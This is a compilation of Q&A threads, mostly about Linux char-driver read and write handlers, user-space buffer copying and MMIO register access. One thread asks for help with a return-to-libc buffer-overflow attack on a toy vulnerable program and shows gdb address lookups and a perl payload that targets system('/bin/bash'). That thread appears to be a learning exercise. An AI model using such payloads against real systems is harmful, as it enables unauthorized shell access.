Understanding of write file operation in char driver - linux-kernel

I am learning char drivers.But i didn't understand write operation of char device driver properly. the below is my write operation
static ssize_t dev_write(struct file *fil,const char *buff,size_t len,loff_t *off)
{
int count =0;
int i =0;
int flag=0;
pr_info("user input string %s\n",buff);
pr_info("user input string len %d\n",len);
return len;
}
my doubt is if i write into my device like
echo "hello" > /dev/myDev
The below are contents of dmesg
[20596.975355] user input string hello
[20596.975355] 77b9e4
[20596.975355] insmod insmod
[20596.975355] n/zeitgeist-daemon
[20596.975355] atives
[20596.975355]
[20596.975355] vars "${upargs[#]}"
[20596.975355] cur cword words=();
[20596.975355] local upargs=() upvars=() vcur vcword vprev vwords;
[20596.975355] while getopts "c:i:n:p:w:" flag "$#"; do
[20596.975355] case $flag in
[20596.975355] c)
[20596.975355] vcur=$OPTARG
[20596.975355] ;;
[20596.975355] i)
[20596.975355] vcword=$OPTARG
[20596.975355] ;;
[20596.975355] n)
[20596.975355] exclude=$OPTARG
[20596.975355] ;;
[20596.975355] p)
[20596.975355] vprev=$OPTARG
[20596.975355] ;;
[20596.975355] w)
[20596.975355] vwords=$OPTARG
[20596.975355] ;;
[20596.975358] user input string len 6
[20596.975361] Device closed
so i didn't understand what is happening inside .Can any one please explain what is happening?And how to access only user input string i.e "hello" Thanks

When you do a echo on the "/dev/myDev" file, this calls write("/dev/myDev") system call in the user space. This translates to a file_operations ops (struct file_operations *)->write call invokes the function dev_write() in the kernel space.
Now looks like the original definition may be wrong as its missing a __user, which points to the user space application buffer. Its not recommended to print or play around with the user space the buffer directly, as this is messing up something and printing lot of other data possibly some pages pertaining to .text section of some program.
Instead you should use create a kernel buffer and copy the contents using copy_from_user() or simple_write_to_buffer() before print the buffer into syslog. The reason for this kernel space pages are always pinned to the memory and don’t page-in page-out, while the user space pages are allowed to page-out/in of the memory, using the copy_{from,to}_user() and {get,put}_user() makes a pointer page are first validated to ensure page faults don’t occur while reading from these buffers.
ex:
static ssize_t dev_write(struct file *fil,const char __user *buff,size_t len,loff_t *off)
Hope this helps.

%s expects a zero-terminated string, but the buffer for write() contains only as many bytes as were actually written.
Furthermore, user-space buffers might be swapped out, or not exist because the program used a wrong pointer, so you must always use functions like get_user() or copy_from_user() to access user-space buffers.

Related

commenting out a printk statement causes crash in a linux device driver test

I'm seeing a weird case in a simple linux driver test(arm64).
The user program calls ioctl of a device driver and passes array 'arg' of uint64_t as argument. By the way, arg[2] contains a pointer to a variable in the app. Below is the code snippet.
case SetRunParameters:
copy_from_user(args, (void __user *)arg, 8*3);
offs = args[2] % PAGE_SIZE;
down_read(&current->mm->mmap_sem);
res = get_user_pages( (unsigned long)args[2], 1, 1, &pages, NULL);
if (res) {
kv_page_addr = kmap(pages);
kv_addr = ((unsigned long long int)(kv_page_addr)+offs);
args[2] = page_to_phys(pages) + offset; // args[2] changed to physical
}
else {
printk("get_user_pages failed!\n");
}
up_read(&current->mm->mmap_sem);
*(vaddr + REG_IOCTL_ARG/4) = virt_to_phys(args); // from axpu_regs.h
printk("ldd:writing %x at %px\n",cmdx,vaddr + REG_IOCTL_CMD/4); // <== line 248. not ok w/o this printk line why?..
*(vaddr + REG_IOCTL_CMD/4) = cmdx; // this command is different from ioctl cmd!
put_page(pages); //page_cache_release(page);
break;
case ...
I have marked line 248 in above code. If I comment out the printk there, a trap occurs and the virtual machine collapses(I'm doing this on a qemu virtual machine). The cmdx is a integer value set according to the ioctl command from the app, and vaddr is the virtual address of the device (obtained from ioremap). If I keep the printk, it works as I expect. What case can make this happen? (cache or tlb?)
Accessing memory-mapped registers by simple C constructs such as *(vaddr + REG_IOCTL_ARG/4) is a bad idea. You might get away with it on some platforms if the access is volatile-qualified, but it won't work reliably or at all on some platforms. The proper way to access memory-mapped registers is via the functions declared by #include <asm/io.h> or #include <linux/io.h>. These will take care of any arch-specific requirements to ensure that writes are properly ordered as far as the CPU is concerned1.
The functions for memory-mapped register access are described in the Linux kernel documentation under Bus-Independent Device Accesses.
This code:
*(vaddr + REG_IOCTL_ARG/4) = virt_to_phys(args);
*(vaddr + REG_IOCTL_CMD/4) = cmdx;
can be rewritten as:
writel(virt_to_phys(args), vaddr + REG_IOCTL_ARG/4);
writel(cmdx, vaddr + REG_IOCTL_CMD/4);
1 Write-ordering for specific bus types such as PCI may need extra code to read a register inbetween writes to different registers if the ordering of the register writes is important. That is because writes are "posted" asynchronously to the PCI bus, and the PCI device may process writes to different registers out of order. An intermediate register read will not be handled by the device until all preceding writes have been handled, so it can be used to enforce ordering of posted writes.

how to transfer string(char*) in kernel into user process using copy_to_user

I'm making code to transfer string in kernel to usermode using systemcall and copy_to_user
here is my code
kernel
#include<linux/kernel.h>
#include<linux/syscalls.h>
#include<linux/sched.h>
#include<linux/slab.h>
#include<linux/errno.h>
asmlinkage int sys_getProcTagSysCall(pid_t pid, char **tag){
printk("getProcTag system call \n\n");
struct task_struct *task= (struct task_struct*) kmalloc(sizeof(struct task_struct),GFP_KERNEL);
read_lock(&tasklist_lock);
task = find_task_by_vpid(pid);
if(task == NULL )
{
printk("corresponding pid task does not exist\n");
read_unlock(&tasklist_lock);
return -EFAULT;
}
read_unlock(&tasklist_lock);
printk("Corresponding pid task exist \n");
printk("tag is %s\n" , task->tag);
/*
task -> tag : string is stored in task->tag (ex : "abcde")
this part is well worked
*/
if(copy_to_user(*tag, task->tag, sizeof(char) * task->tag_length) !=0)
;
return 1;
}
and this is user
#include<stdio.h>
#include<stdlib.h>
int main()
{
char *ret=NULL;
int pid = 0;
printf("PID : ");
scanf("%4d", &pid);
if(syscall(339, pid, &ret)!=1) // syscall 339 is getProcTagSysCall
printf("pid %d does not exist\n", pid);
else
printf("Corresponding pid tag is %s \n",ret); //my output is %s = null
return 0;
}
actually i don't know about copy_to_user well. but I think copy_to_user(*tag, task->tag, sizeof(char) * task->tag_length) is operated like this code
so i use copy_to_user like above
#include<stdio.h>
int re();
void main(){
char *b = NULL;
if (re(&b))
printf("success");
printf("%s", b);
}
int re(char **str){
char *temp = "Gdg";
*str = temp;
return 1;
}
Is this a college assignment of some sort?
asmlinkage int sys_getProcTagSysCall(pid_t pid, char **tag){
What is this, Linux 2.6? What's up with ** instead of *?
printk("getProcTag system call \n\n");
Somewhat bad. All strings are supposed to be prefixed.
struct task_struct *task= (struct task_struct*) kmalloc(sizeof(struct task_struct),GFP_KERNEL);
What is going on here? Casting malloc makes no sense whatsoever, if you malloc you should have used sizeof(*task) instead, but you should not malloc in the first place. You want to find a task and in fact you just overwrite this pointer's value few lines later anyway.
read_lock(&tasklist_lock);
task = find_task_by_vpid(pid);
find_task_by_vpid requires RCU. The kernel would have told you that if you had debug enabled.
if(task == NULL )
{
printk("corresponding pid task does not exist\n");
read_unlock(&tasklist_lock);
return -EFAULT;
}
read_unlock(&tasklist_lock);
So... you unlock... but you did not get any kind of reference to the task.
printk("Corresponding pid task exist \n");
printk("tag is %s\n" , task->tag);
... in other words by the time you do task->tag, the task may already be gone. What requirements are there to access ->tag itself?
if(copy_to_user(*tag, task->tag, sizeof(char) * task->tag_length) !=0)
;
What's up with this? sizeof(char) is guaranteed to be 1.
I'm really confused by this entire business.
When you have a syscall which copies data to userspace where amount of data is not known prior to the call, teh syscall accepts both buffer AND its size. Then you can return appropriate error if the thingy you are trying to copy would not fit.
However, having a syscall in the first place looks incorrect. In linux per-task data is exposed to userspace in /proc/pid/. Figuring out how to add a file to proc is easy and left as an exercise for the reader.
It's quite obvious from the way you fixed it. copy_to_user() will only copy data between two memory regions - one accessible only to kernel and the other accessible also to user. It will not, however, handle any memory allocation. Userspace buffer has to be already allocated and you should pass address of this buffer to the kernel.
One more thing you can change is to change your syscall to use normal pointer to char instead of pointer to pointer which is useless.
Also note that you are leaking memory in your kernel code. You allocate memory for task_struct using kmalloc and then you override the only pointer you have to this memory when calling find_task_by_vpid() and this memory is never freed. find_task_by_vpid() will return a pointer to a task_struct which already exists in memory so there is no need to allocate any buffer for this.
i solved my problem by making malloc in user
I changed
char *b = NULL;
to
char *b = (char*)malloc(sizeof(char) * 100)
I don't know why this work properly. but as i guess copy_to_user get count of bytes as third argument so I should malloc before assigning a value
I don't know. anyone who knows why adding malloc is work properly tell me

Read system call gives wrong count size?

I have created a misc driver and has made a sample read function like this
static ssize_t test_read(struct file *file, char __user *buffer,
size_t count, loff_t *ppos)
{
pr_info("Count arg : %d\n",count);
return ret;
}
I now try to read the device using a userspace code as shown below
uint64_t read_buff;
fread(&read_buff, sizeof(read_buff), 1, fp)
The dmesg log I get is
[ 1593.273163] Count arg : 4096
I was expecting it to be of the size of uint64_t. Could anybody point me why I get an unexpected value?
Seems that fread() tries to buffer some data for userland. I found source code of one fread() that buffers data (in __srefill()). So, it's OK for fread() to do so.
If you want to avoid such unexpected results, lower one level down and work with read() function in userland.

I want to try a return-to-libc attack

The program I want to attack is the following:
int main(int argc, char *argv[])
{
char buffer[256];
if(argc < 2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
It is in redhat 6.2, so I didn't think there was anything to consider.
So I tried this:
(gdb) b main
Breakpoint 1 at 0x8048439
(gdb) r
Starting program: /home/asdf/asdfghj
Breakpoint 1, 0x8048439 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) x/s 0xbfffff8e
0xbfffff8e: "/bin/bash"
(gdb) q
So my payload looked like this, the first 260 bytes being the buffer+sfp, then the address of the system function, a 4 byte dummy, and the address of the argument, "/bin/bash".
./asdfghj `perl -e 'print "\x90"x260, "\xe0\x8a\x05\x40", "AAAA", "\x8e\xff\xff\xbf"'`
However this still gives me only a segmentation fault. I have no idea how to fix this, and the addresses come from the dumped core of the program which I set a breakpoint, ran it, then got the addresses.
What should I check to successfully attack the program and what do you think is the problem? Is it that I use /bin/bash, or any of the addresses incorrect?
Plus, I've already set bash2 for default.
Thanks. :)

Regarding how the parameters to the read function is passed in simple char driver

I am newbei to driver programming i am started writing the simple char driver . Then i created special file for my char driver mknod /dev/simple-driver c 250 0 .when it type cat /dev/simple-driver. it shows the string "Hello world from Kernel mode!". i know that function
static const char g_s_Hello_World_string[] = "Hello world tamil_vanan!\n\0";
static const ssize_t g_s_Hello_World_size = sizeof(g_s_Hello_World_string);
static ssize_t device_file_read(
struct file *file_ptr
, char __user *user_buffer
, size_t count
, loff_t *possition)
{
printk( KERN_NOTICE "Simple-driver: Device file is read at offset =
%i, read bytes count = %u", (int)*possition , (unsigned int)count );
if( *possition >= g_s_Hello_World_size )
return 0;
if( *possition + count > g_s_Hello_World_size )
count = g_s_Hello_World_size - *possition;
if( copy_to_user(user_buffer, g_s_Hello_World_string + *possition, count) != 0 )
return -EFAULT;
*possition += count;
return count;
}
is get called . This is mapped to (*read) in file_opreation structure of my driver .My question is how this function is get called , how the parameters like struct file,char,count, offset are passed bcoz is i simply typed cat command ..Please elabroate how this happening
In Linux all are considered as files. The type of file, whether it is a driver file or normal file depends upon the mount point where it is mounted.
For Eg: If we consider your case : cat /dev/simple-driver traverses back to the mount point of device files.
From the device file name simple-driver it retrieves Major and Minor number.
From those number(especially from minor number) it associates the driver file for your character driver.
From the driver it uses struct file ops structure to find the read function, which is nothing but your read function:
static ssize_t device_file_read(struct file *file_ptr, char __user *user_buffer, size_t count, loff_t *possition)
User_buffer will always take sizeof(size_t count).It is better to keep a check of buffer(In some cases it throws warning)
String is copied to User_buffer(copy_to_user is used to check kernel flags during copy operation).
postion is 0 for first copy and it increments in the order of count:position+=count.
Once read function returns the buffer to cat. and cat flushes the buffer contents on std_out which is nothing but your console.
cat will use some posix version of read call from glibc. Glibc will put the arguments on the stack or in registers (this depends on your hardware architecture) and will switch to kernel mode. In the kernel the values will be copied to the kernel stack. And in the end your read function will be called.

Resources